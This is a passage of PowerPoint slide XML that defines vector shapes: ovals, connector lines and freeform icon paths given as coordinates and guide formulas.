                  <a:gd name="connsiteY8" fmla="*/ 51481 h 76903"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 76903"/>
                  <a:gd name="connsiteY9" fmla="*/ 51481 h 76903"/>
                  <a:gd name="connsiteX10" fmla="*/ 0 w 76903"/>
                  <a:gd name="connsiteY10" fmla="*/ 25423 h 76903"/>
                  <a:gd name="connsiteX11" fmla="*/ 26058 w 76903"/>
                  <a:gd name="connsiteY11" fmla="*/ 25423 h 76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6903" h="76903">
                    <a:moveTo>
                      <a:pt x="26058" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="51480" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51480" y="25423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76903" y="25423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76903" y="51481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51480" y="51481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51480" y="76903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26058" y="76903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26058" y="51481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="51481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26058" y="25423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1" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5738814" y="4682341"/>
                <a:ext cx="57201" cy="80081"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 38"/>
                  <a:gd name="T1" fmla="*/ 1 h 53"/>
                  <a:gd name="T2" fmla="*/ 3 w 38"/>
                  <a:gd name="T3" fmla="*/ 25 h 53"/>
                  <a:gd name="T4" fmla="*/ 3 w 38"/>
                  <a:gd name="T5" fmla="*/ 42 h 53"/>
                  <a:gd name="T6" fmla="*/ 27 w 38"/>
                  <a:gd name="T7" fmla="*/ 49 h 53"/>
                  <a:gd name="T8" fmla="*/ 33 w 38"/>
                  <a:gd name="T9" fmla="*/ 25 h 53"/>
                  <a:gd name="T10" fmla="*/ 19 w 38"/>
                  <a:gd name="T11" fmla="*/ 1 h 53"/>
                  <a:gd name="T12" fmla="*/ 17 w 38"/>
                  <a:gd name="T13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53">
                    <a:moveTo>
                      <a:pt x="17" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="25"/>
                      <a:pt x="3" y="25"/>
                      <a:pt x="3" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="30"/>
                      <a:pt x="0" y="37"/>
                      <a:pt x="3" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="51"/>
                      <a:pt x="18" y="53"/>
                      <a:pt x="27" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="44"/>
                      <a:pt x="38" y="33"/>
                      <a:pt x="33" y="25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7" y="0"/>
                      <a:pt x="17" y="1"/>
                    </a:cubicBez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7168" name="Oval 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5683560" y="3729145"/>
            <a:ext cx="526560" cy="479363"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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74" name="Oval 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5020654" y="3754136"/>
            <a:ext cx="437500" cy="39745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84" name="Oval 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6243114" y="3562884"/>
            <a:ext cx="346339" cy="31558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97" name="Oval 66"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5961784" y="4625809"/>
            <a:ext cx="437500" cy="39677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7216" name="Oval 78"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6902914" y="3770781"/>
            <a:ext cx="437500" cy="39779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7230" name="Oval 92"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5961784" y="2914394"/>
            <a:ext cx="437500" cy="39779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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="92" name="Straight Connector 91"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5746581" y="1068353"/>
            <a:ext cx="0" cy="2002239"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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Straight Connector 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780072C6-5682-474F-8A67-0369B0EC3E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6759299" y="1068353"/>
            <a:ext cx="0" cy="2065792"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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0" name="Freeform 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C3956B-E822-484B-9B24-47828868F7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6083" y="2996295"/>
            <a:ext cx="253924" cy="221656"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 107500 w 480"/>
              <a:gd name="T1" fmla="*/ 146895 h 436"/>
              <a:gd name="T2" fmla="*/ 107500 w 480"/>
              <a:gd name="T3" fmla="*/ 146895 h 436"/>
              <a:gd name="T4" fmla="*/ 83661 w 480"/>
              <a:gd name="T5" fmla="*/ 171079 h 436"/>
              <a:gd name="T6" fmla="*/ 107500 w 480"/>
              <a:gd name="T7" fmla="*/ 194815 h 436"/>
              <a:gd name="T8" fmla="*/ 131339 w 480"/>
              <a:gd name="T9" fmla="*/ 171079 h 436"/>
              <a:gd name="T10" fmla="*/ 107500 w 480"/>
              <a:gd name="T11" fmla="*/ 146895 h 436"/>
              <a:gd name="T12" fmla="*/ 59822 w 480"/>
              <a:gd name="T13" fmla="*/ 123159 h 436"/>
              <a:gd name="T14" fmla="*/ 59822 w 480"/>
              <a:gd name="T15" fmla="*/ 123159 h 436"/>
              <a:gd name="T16" fmla="*/ 75565 w 480"/>
              <a:gd name="T17" fmla="*/ 139282 h 436"/>
              <a:gd name="T18" fmla="*/ 139435 w 480"/>
              <a:gd name="T19" fmla="*/ 139282 h 436"/>
              <a:gd name="T20" fmla="*/ 155178 w 480"/>
              <a:gd name="T21" fmla="*/ 123159 h 436"/>
              <a:gd name="T22" fmla="*/ 59822 w 480"/>
              <a:gd name="T23" fmla="*/ 123159 h 436"/>
              <a:gd name="T24" fmla="*/ 27887 w 480"/>
              <a:gd name="T25" fmla="*/ 91362 h 436"/>
              <a:gd name="T26" fmla="*/ 27887 w 480"/>
              <a:gd name="T27" fmla="*/ 91362 h 436"/>
              <a:gd name="T28" fmla="*/ 44080 w 480"/>
              <a:gd name="T29" fmla="*/ 107484 h 436"/>
              <a:gd name="T30" fmla="*/ 171371 w 480"/>
              <a:gd name="T31" fmla="*/ 107484 h 436"/>
              <a:gd name="T32" fmla="*/ 187563 w 480"/>
              <a:gd name="T33" fmla="*/ 91362 h 436"/>
              <a:gd name="T34" fmla="*/ 27887 w 480"/>
              <a:gd name="T35" fmla="*/ 91362 h 436"/>
              <a:gd name="T36" fmla="*/ 0 w 480"/>
              <a:gd name="T37" fmla="*/ 60012 h 436"/>
              <a:gd name="T38" fmla="*/ 0 w 480"/>
              <a:gd name="T39" fmla="*/ 60012 h 436"/>
              <a:gd name="T40" fmla="*/ 11695 w 480"/>
              <a:gd name="T41" fmla="*/ 75687 h 436"/>
              <a:gd name="T42" fmla="*/ 199258 w 480"/>
              <a:gd name="T43" fmla="*/ 75687 h 436"/>
              <a:gd name="T44" fmla="*/ 215450 w 480"/>
              <a:gd name="T45" fmla="*/ 60012 h 436"/>
              <a:gd name="T46" fmla="*/ 0 w 480"/>
              <a:gd name="T47" fmla="*/ 60012 h 4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80" h="436">
                <a:moveTo>
                  <a:pt x="239" y="328"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="239" y="328"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="328"/>
                  <a:pt x="186" y="355"/>
                  <a:pt x="186" y="382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="409"/>
                  <a:pt x="213" y="435"/>
                  <a:pt x="239" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="435"/>
                  <a:pt x="292" y="409"/>
                  <a:pt x="292" y="382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="355"/>
                  <a:pt x="266" y="328"/>
                  <a:pt x="239" y="328"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="133" y="275"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="133" y="275"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="311"/>
                  <a:pt x="168" y="311"/>
                  <a:pt x="168" y="311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="275"/>
                  <a:pt x="266" y="275"/>
                  <a:pt x="310" y="311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="345" y="275"/>
                  <a:pt x="345" y="275"/>
                  <a:pt x="345" y="275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="222"/>
                  <a:pt x="195" y="222"/>
                  <a:pt x="133" y="275"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="204"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="240"/>
                  <a:pt x="98" y="240"/>
                  <a:pt x="98" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="169"/>
                  <a:pt x="301" y="169"/>
                  <a:pt x="381" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="204"/>
                  <a:pt x="417" y="204"/>
                  <a:pt x="417" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="107"/>
                  <a:pt x="160" y="107"/>
                  <a:pt x="62" y="204"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="134"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="134"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="169"/>
                  <a:pt x="26" y="169"/>
                  <a:pt x="26" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="54"/>
                  <a:pt x="328" y="54"/>
                  <a:pt x="443" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="134"/>
                  <a:pt x="479" y="134"/>
                  <a:pt x="479" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="345" y="0"/>
                  <a:pt x="133" y="0"/>
                  <a:pt x="0" y="13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lIns="34290" tIns="17145" rIns="34290" bIns="17145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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B641B9DC-E0F0-4B75-B1F5-03CB5AE7DB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9174" y="3846269"/>
            <a:ext cx="230941" cy="206750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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82" name="Freeform 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE1BEB2-D094-4D28-A821-C274744F2DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5813921" y="3841463"/>
            <a:ext cx="269381" cy="229618"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 209550 w 61"/>
              <a:gd name="T1" fmla="*/ 174983 h 62"/>
              <a:gd name="T2" fmla="*/ 171762 w 61"/>
              <a:gd name="T3" fmla="*/ 212725 h 62"/>
              <a:gd name="T4" fmla="*/ 37788 w 61"/>
              <a:gd name="T5" fmla="*/ 212725 h 62"/>
              <a:gd name="T6" fmla="*/ 0 w 61"/>
              <a:gd name="T7" fmla="*/ 174983 h 62"/>
              <a:gd name="T8" fmla="*/ 0 w 61"/>
              <a:gd name="T9" fmla="*/ 41173 h 62"/>
              <a:gd name="T10" fmla="*/ 37788 w 61"/>
              <a:gd name="T11" fmla="*/ 0 h 62"/>
              <a:gd name="T12" fmla="*/ 171762 w 61"/>
              <a:gd name="T13" fmla="*/ 0 h 62"/>
              <a:gd name="T14" fmla="*/ 209550 w 61"/>
              <a:gd name="T15" fmla="*/ 41173 h 62"/>
              <a:gd name="T16" fmla="*/ 209550 w 61"/>
              <a:gd name="T17" fmla="*/ 174983 h 62"/>
              <a:gd name="T18" fmla="*/ 37788 w 61"/>
              <a:gd name="T19" fmla="*/ 41173 h 62"/>
              <a:gd name="T20" fmla="*/ 34352 w 61"/>
              <a:gd name="T21" fmla="*/ 41173 h 62"/>
              <a:gd name="T22" fmla="*/ 34352 w 61"/>
              <a:gd name="T23" fmla="*/ 44604 h 62"/>
              <a:gd name="T24" fmla="*/ 34352 w 61"/>
              <a:gd name="T25" fmla="*/ 61759 h 62"/>
              <a:gd name="T26" fmla="*/ 37788 w 61"/>
              <a:gd name="T27" fmla="*/ 68621 h 62"/>
              <a:gd name="T28" fmla="*/ 144280 w 61"/>
              <a:gd name="T29" fmla="*/ 174983 h 62"/>
              <a:gd name="T30" fmla="*/ 147716 w 61"/>
              <a:gd name="T31" fmla="*/ 178415 h 62"/>
              <a:gd name="T32" fmla="*/ 168327 w 61"/>
              <a:gd name="T33" fmla="*/ 178415 h 62"/>
              <a:gd name="T34" fmla="*/ 168327 w 61"/>
              <a:gd name="T35" fmla="*/ 174983 h 62"/>
              <a:gd name="T36" fmla="*/ 171762 w 61"/>
              <a:gd name="T37" fmla="*/ 174983 h 62"/>
              <a:gd name="T38" fmla="*/ 37788 w 61"/>
